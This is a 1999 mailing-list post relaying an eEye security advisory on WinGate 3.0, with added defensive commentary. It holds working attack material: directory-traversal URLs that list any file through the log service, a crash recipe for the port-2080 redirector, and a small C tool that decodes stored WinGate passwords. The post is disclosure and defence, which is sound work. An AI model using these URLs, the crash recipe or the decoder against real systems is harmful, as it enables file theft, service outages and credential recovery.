Date: Mon, 5 Apr 1999 17:52:51 -0700
From: Marc
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Multiple WinGate Vulnerabilities [Tad late]

At first we were just going to post this advisory to our website, but after the subject came up on the NTSEC list and we got a few emails telling us to post it to the other lists... well, here it is.

Signed,
Marc
eEye Digital Security Team
http://www.eEye.com

P.S. Go see Matrix.

________________________________________________________________________
eEye Digital Security Team
www.eEye.com
info@eEye.com
February 22, 1999
________________________________________________________________________

Multiple WinGate Vulnerabilities

Systems Affected: WinGate 3.0
Release Date:     February 22, 1999
Advisory Code:    AD02221999

________________________________________________________________________
Description:
________________________________________________________________________

WinGate 3.0 has three vulnerabilities:

1. Read any file on the remote system.
2. DoS the WinGate service.
3. Decrypt WinGate passwords.

________________________________________________________________________
Read any file on the remote system
________________________________________________________________________

We were debating whether to add this to the advisory or not. We figured it would not hurt, so here it is. The WinGate Log File service has in the past had holes where you can read any file on the system; those holes still seem to be there, and some new ways of doing it have cropped up:

http://www.server.com:8010/c:/      - NT/Win9x
http://www.server.com:8010//        - NT/Win9x
http://www.server.com:8010/..../    - Win9x

Each of the above URLs will list all files on the remote machine (the "...." form relies on Windows 9x treating a run of dots as a parent-directory reference, which is why it only works there). There are a few reasons why we were not sure about posting this information. By default, all WinGate services are set so that only 127.0.0.1 can use them.
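The following is an added example and is not WinGate's code nor part of the eEye advisory: a hypothetical request-path check of the kind a log-viewing HTTP service would need in front of the filesystem, written so that each of the three URLs above is refused for a stated reason. Everything in it is an assumption about how such a check would be written. It expects the path to be URL-decoded already and it does not replace confining the service to a dedicated log directory; it only shows which shapes of path must never reach `open()`.

```c
/*
 * Added example, not WinGate's code and not from the eEye advisory: a
 * hypothetical request-path check for a log-viewing HTTP service.  It
 * assumes the caller has already URL-decoded the path (so "%2e%2e" has
 * become "..") and that only files under a log directory may be served.
 */
#include <stdio.h>
#include <string.h>

/* Why a path was refused; callers can log the reason. */
enum path_verdict {
    PATH_OK = 0,
    PATH_EMPTY,      /* "/" or "logs/": no file named, would turn into a directory listing */
    PATH_ABSOLUTE,   /* "//" or "c:" : absolute path or drive letter escapes the log dir */
    PATH_TRAVERSAL,  /* ".", "..", "....": Win9x treats runs of dots as parent directories */
    PATH_BAD_CHAR    /* backslash or control character */
};

/*
 * Accept only "name/name/.../file" where every component contains at
 * least one non-dot character.  ':' is refused because its only uses in
 * a Windows path are a drive letter ("c:") and an NTFS alternate data
 * stream ("file.txt:stream"), neither of which a log viewer should reach.
 */
enum path_verdict check_log_path(const char *url_path)
{
    const char *p = url_path;

    if (*p == '/')                 /* the one leading '/' every URL path has */
        p++;
    if (*p == '/')                 /* a second one ("//") is an absolute path */
        return PATH_ABSOLUTE;
    if (*p == '\0')                /* "/" alone: nothing named */
        return PATH_EMPTY;

    while (*p) {
        int has_non_dot = 0;
        const char *start = p;

        while (*p && *p != '/') {
            unsigned char c = (unsigned char)*p;
            if (c == ':')
                return PATH_ABSOLUTE;
            if (c == '\\' || c < 0x20 || c == 0x7f)
                return PATH_BAD_CHAR;
            if (c != '.')
                has_non_dot = 1;
            p++;
        }
        if (p == start)            /* "a//b": empty component */
            return PATH_EMPTY;
        if (!has_non_dot)          /* ".", "..", "...." and longer runs */
            return PATH_TRAVERSAL;
        if (*p == '/') {
            p++;
            if (*p == '\0')        /* trailing '/': a directory, not a file */
                return PATH_EMPTY;
        }
    }
    return PATH_OK;
}

/* Human-readable verdict, for the demo below and for server logs. */
const char *path_verdict_name(enum path_verdict v)
{
    switch (v) {
    case PATH_OK:        return "ok";
    case PATH_EMPTY:     return "refused: no file named";
    case PATH_ABSOLUTE:  return "refused: absolute path or drive letter";
    case PATH_TRAVERSAL: return "refused: dot-only component";
    case PATH_BAD_CHAR:  return "refused: bad character";
    }
    return "refused: unknown";
}

int main(void)
{
    /* The three paths from the advisory plus constructed control cases. */
    const char *paths[] = {
        "/c:/", "//", "/..../",
        "/../wingate.ini", "/logs/", "/logs/wingate.log"
    };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        printf("%-20s %s\n", paths[i], path_verdict_name(check_log_path(paths[i])));
    return 0;
}
```

The check is deliberately an allow-list on the shape of the path rather than a deny-list of the three known strings: a deny-list would still let "/..../" through on a build that only looked for "..", and would miss the colon forms entirely.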
However, the whole point of the log file service is to let users view the logs remotely, so chances are people using it are not going to leave it restricted to 127.0.0.1. Also, "Browse" is enabled by default in the WinGate settings. We are not sure whether the developers intended the Browse option to cover the whole hard drive; we would hope not. The main reason we did put this in the advisory is that the average person using WinGate (cable modem users, etc.) is not security-minded and will open the Log Service so that everyone has access to it. We understand there are papers out there saying not to do this, and even the program itself says not to, but the average user will not register this as dangerous, so the software should at least make it as secure as possible. Letting people read any file does not live up to that standard. Anyway, let's move on...

________________________________________________________________________
DoS the WinGate Service
________________________________________________________________________

The Winsock Redirector Service listens on port 2080. Connect to it, send 2000 characters, and disconnect: all WinGate services crash. Oh, yippee.

________________________________________________________________________
Decrypt the WinGate passwords
________________________________________________________________________

The registry keys where WinGate stores its passwords are insecure and let everyone read them. Therefore anyone can read the stored values and decrypt them. The decryption itself is trivial: byte i of the stored value is the plaintext byte XORed with 2*(i+1), so the "key" is a fixed function of the byte's position and no secret is involved. Code follows.

________________________________________________________________________

// ChrisA@eEye.com
// Mike@eEye.com
// Built with MSVC originally; "stdafx.h" was its precompiled header and
// is not needed on other compilers.
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    size_t i;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <stored-password-string>\n", argv[0]);
        return 1;
    }
    /* byte i of the stored value is the plaintext byte XOR 2*(i+1) */
    for (i = 0; i < strlen(argv[1]); i++)
        putchar(argv[1][i] ^ (char)((i + 1) << 1));
    putchar('\n');
    return 0;
}

________________________________________________________________________

You get the idea...
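As an added example (not the advisory's tool and not WinGate's code), here is the same position-keyed XOR transform as a reusable routine, with a round trip that makes the point the advisory is making: because the key stream is 2, 4, 6, ... regardless of any secret, the one function both produces the stored form and recovers the plaintext, so anyone who can read the registry value can read the password. The sample password is constructed for the demo.

```c
/*
 * Added example, not from the eEye advisory and not WinGate's code: the
 * per-position XOR that the advisory's decoder applies, as a function
 * that both obfuscates and de-obfuscates.  The sample value in main()
 * is constructed, not a real WinGate registry value.
 */
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/*
 * out[i] = in[i] XOR (2 * (i + 1)), truncated to one byte.  The key
 * depends only on the position, so applying this twice is the identity.
 */
void wingate_xor(const unsigned char *in, size_t n, unsigned char *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ (unsigned char)(((i + 1) << 1) & 0xff);
}

/*
 * String convenience wrapper, matching the argv[1] interface of the
 * advisory's tool; out needs strlen(in)+1 bytes.  Note that if a
 * plaintext byte equals its key byte the result contains a NUL and a
 * string interface truncates there; use wingate_xor() with an explicit
 * length for raw registry data.
 */
void wingate_xor_str(const char *in, char *out)
{
    size_t n = strlen(in);
    wingate_xor((const unsigned char *)in, n, (unsigned char *)out);
    out[n] = '\0';
}

/* Returns 1 when obfuscate-then-deobfuscate reproduces the input bytes. */
int wingate_roundtrip_ok(const char *plain)
{
    unsigned char obf[256], back[256];
    size_t n = strlen(plain);

    if (n > sizeof obf)
        return 0;
    wingate_xor((const unsigned char *)plain, n, obf);
    wingate_xor(obf, n, back);
    return memcmp(plain, back, n) == 0;
}

int main(void)
{
    const char *sample = "secret";       /* constructed sample password */
    char stored[256], recovered[256];

    wingate_xor_str(sample, stored);     /* what would sit in the registry */
    wingate_xor_str(stored, recovered);  /* what any local reader gets back */
    printf("plain:     %s\nstored:    %s\nrecovered: %s\n",
           sample, stored, recovered);
    return 0;
}
```

The round trip is the whole security argument in miniature: with a real cipher the recovery step would need a key the attacker does not have, and with a password hash there would be no recovery step at all. Here the registry ACL is the only thing standing between a reader and the plaintext, and the advisory reports that ACL grants Everyone read access.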
It is good that WinGate 3.0 locks all services down to 127.0.0.1 by default. However, there still seem to be holes where anyone who can reach a WinGate service from a non-blocked IP can do some damage. Chances are that if you poke hard at some of the other services you will find problems similar to the ones above. Software developers need to remember that the average user is not always security-minded, so our products' security must be as tight as possible.

________________________________________________________________________
Vendor Status
________________________________________________________________________

Contacted a month or so ago; we have heard nothing. Someone from the NTSEC list contacted eval-support@wingate.net with our findings and was sent an email back rather quickly. We had sent our emails to support@wingate.net and the like; maybe all three of our emails just got lost. The last we have heard, WinGate is taking steps to fix the problem. Look for patches soon.

________________________________________________________________________
Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________

Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

________________________________________________________________________
Disclaimer:
________________________________________________________________________

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security Team
info@eEye.com
http://www.eEye.com